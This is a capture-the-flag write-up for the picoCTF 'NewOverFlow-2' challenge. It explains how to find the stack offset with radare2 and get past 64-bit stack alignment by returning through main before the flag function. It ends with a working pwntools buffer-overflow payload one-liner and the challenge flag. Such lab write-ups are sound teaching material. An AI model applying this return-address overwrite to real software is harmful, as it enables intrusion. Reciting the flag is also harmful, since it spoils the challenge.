Comment on page

NewOverFlow-2

Problem

Okay now lets try mainpulating arguments. program. You can find it in /problems/newoverflow-2_5_13f3d3dc09fc09d6d5db8adfa899a05d on the shell server. Source.

Solution

  1. 1.
    The challenge author forgot to remove the flag function so this is solvable using the same method as NewOverFlow-1
  2. 2.
    Find the offset/padding
    1. 1.
      You can use the method described in rop64 with the cyclic and cyclic_find or you can use the following
    2. 2.
      Open vuln in radare2 with r2 ./vuln
    3. 3.
      Run aaaa
    4. 4.
      Run pdf @ sym.vuln to get var int local_40h @ rbp-0x40
    5. 5.
      The 0x40 is the buffer location so 8 more bytes are needed to get past the "saved ebp register"
    6. 6.
      So the offset is 0x40+8
  3. 3.
    Run afl~flag in radare2 to get the address of flag and afl~main to get the address of main.
  4. 4.
    We can not offset and call the flag function directly because that would cause a stack misalignment in 64-bit. So instead we form out payload by doing padding + main_address + flag_address instead of just padding + flag_address as we would in 32-bit.
  5. 5.
    We can use p64 from pwntools to convert the hex addresses to little endian.
  6. 6.
    Payload complete: python2 -c "from pwn import *; print 'A'*(0x40+8) + p64(0x004008ce) + p64(0x0040084d)" | ./vuln

Flag

picoCTF{r0p_1t_d0nT_st0p_1t_b3358018}